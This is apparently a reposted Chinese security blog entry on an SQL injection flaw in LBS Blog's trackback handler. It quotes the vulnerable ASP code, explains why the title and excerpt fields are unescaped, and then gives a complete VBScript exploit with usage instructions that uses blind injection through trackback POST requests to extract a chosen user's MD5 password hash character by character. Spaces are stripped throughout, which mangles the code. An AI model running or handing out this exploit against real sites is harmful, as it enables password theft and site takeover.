鬼仔注:最近剑心貌似在读LBS的代码,已经挖出几个了。但是好像还不足以刺激SiC发新版。这个洞的补丁看 。 来源:Loveshell source/src_trackback.asp中的注射
functiontrackbackSave(){
vartbEntry={"log_id":input["id"],
"url":input["url"],
"title":input["title"],
"excerpt":input["excerpt"],
"blog":input["blog_name"]
}
//Thesefunctioncallslookreallyhorrible
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
if(tbEntry.title=="")tbEntry.title=tbEntry.url;
//BetterLeavetheerrormessagesbelowinEnglish
if(!tbEntry.log_id)
trackbackResponse(1,"InvalidArticleID");
if(tbEntry.url=="")
trackbackResponse(1,"SourceURLisBlank");
if(tbEntry.url==false||tbEntry.title==false||tbEntry.excerpt==false||tbEntry.blog==false)
trackbackResponse(1,"Contentcontainsblockedwords");
vartmpA=connBlog.query("selectCount(log_ID)asiFROMblog_Articlewherelog_locked=falseANDlog_mode<4ANDlog_ID="+tbEntry.log_id);
if(tmpA[0]["i"]==0)trackbackResponse(1,"Articledoesnotexistorislocked");
tmpA=connBlog.query("selectCount(tb_ID)asiFROMblog_Trackbackwheretb_Title='"+tbEntry.title+"'ANDtb_Excerpt='"+tbEntry.excerpt+"'");
if(tmpA[0]["i"]>0)trackbackResponse(1,"Trackbackisalreadysaved");
//Savingtrackback
注意
tbEntry.log_id=func.checkInt(tbEntry.log_id);
tbEntry.url=func.trim(func.wordFilter(func.checkURL(tbEntry.url)));
tbEntry.title=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.title))));
tbEntry.excerpt=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.excerpt))));
tbEntry.blog=func.trim(func.wordFilter(func.trimHTML(func.trimUBB(tbEntry.blog))));
log_id被检查为int类型了,但是url以及excerpt等等呢?只是wordfilter以及tril以及去掉html的敏感东西而已,对注射是没有影响的,这些东西是从
vartbEntry={"log_id":input["id"],
"url":input["url"],
"title":input["title"],
"excerpt":input["excerpt"],
"blog":input["blog_name"]
}
input里来的哈~~~~,很明显的一个注射嘛!
因为这里注射的特殊性我们要用or,是一个字符类型的注射
这样可以看到效果
标志也很明显就是Trackbackisalreadysaved
那么好了exploit也应该出来了
'============================================================================
'使用说明:
'在命令提示符下:
'cscript.exelbsblog.vbs要攻击的网站的博客路径要破解的博客用户密码
'如:
'cscript.exelbsblog.vbswww.xxxx.com/bbs/boke.aspadmin
'byloveshell
'============================================================================
OnErrorResumeNext
DimoArgs
DimolbsXML'XMLHTTP对象用来打开目标网址
DimTargetURL'目标网址
Dimuserid'博客用户名
DimTempStr'存放已获取的部分MD5密码
DimCharHex'定义16进制字符
Dimcharset
SetoArgs=WScript.arguments
IfoArgs.count<>2ThenCallShowUsage()
SetolbsXML=createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL=oArgs(0)
IfLCase(Left(TargetURL,7))<>"http://"ThenTargetURL="http://"&TargetURL
Ifright(TargetURL,1)<>"/"ThenTargetURL=TargetURL&"/"
TargetURL=TargetURL&"trackback.asp"
userid=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo"LBSBlogAllversionExploit[新的注射漏洞]"&vbcrlf
WScript.echo"By剑心"&vbcrlf
WScript.echo"http://www.loveshell.net/~_~我真的够无聊的......"&vbcrlf&vbcrlf
WScript.echo"+Fuckthesitenow"&vbcrlf
Callmain(TargetURL,BlogName)
SetoBokeXML=Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog用户密码
'============================================
Submain(TargetURL,BlogName)
DimMainOffset,SubOffset,TempLen,OpenURL,GetPage
ForMainOffset=1To40
ForSubOffset=0To15
TempLen=0
postdata=""
postdata="'or(selectleft(user_password,"&MainOffset&")fromblog_userwhereuser_id="&userid&")='"&TempStr&CharHex(SubOffset)&"'and'1'='1"
OpenURL=TargetURL
olbsXML.open"Post",OpenURL,False,"",""
olbsXML.setRequestHeader"Content-Type","application/x-www-form-urlencoded"
olbsXML.send"url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck"&escape(postdata)
GetPage=BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
'WScript.echoGetPage
IfInStr(GetPage,"Trackbackisalreadysaved")<>0Then
TempStr=TempStr&CharHex(SubOffset)
WScript.Echo"+Cracknow:"&TempStr&String(40-MainOffset,"?")
ExitFor
ElseIfInStr(GetPage,"TrackbackDisabled")<>0Then
WScript.echovbcrlf&"Somethingerror,Notvul"&vbcrlf
WScript.Quit
EndIf
next
Next
WScript.Echovbcrlf&"+WeGotIt:"&TempStr&vbcrlf&vbcrlf&":PDon'tBeevil"
Endsub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
FunctionBytesToBstr(body)
dimobjstream
setobjstream=createObject("ADODB.Stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Writebody
objstream.Position=0
objstream.Type=2
objstream.Charset="GB2312"
BytesToBstr=objstream.ReadText
objstream.Close
setobjstream=nothing
EndFunction
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
SubShowUsage()
WScript.echo"LBSblogExploit"&vbcrlf&"ByLoveshell/剑心"
WScript.echo"Usage:"&vbcrlf&"CScript"&WScript.ScriptFullName&"TargetURLuserid"
WScript.echo"Example:"&vbcrlf&"CScript"&WScript.ScriptFullName&"http://www.loveshell.net/1"
WScript.echo""
WScript.Quit
EndSub
|
当前位置:
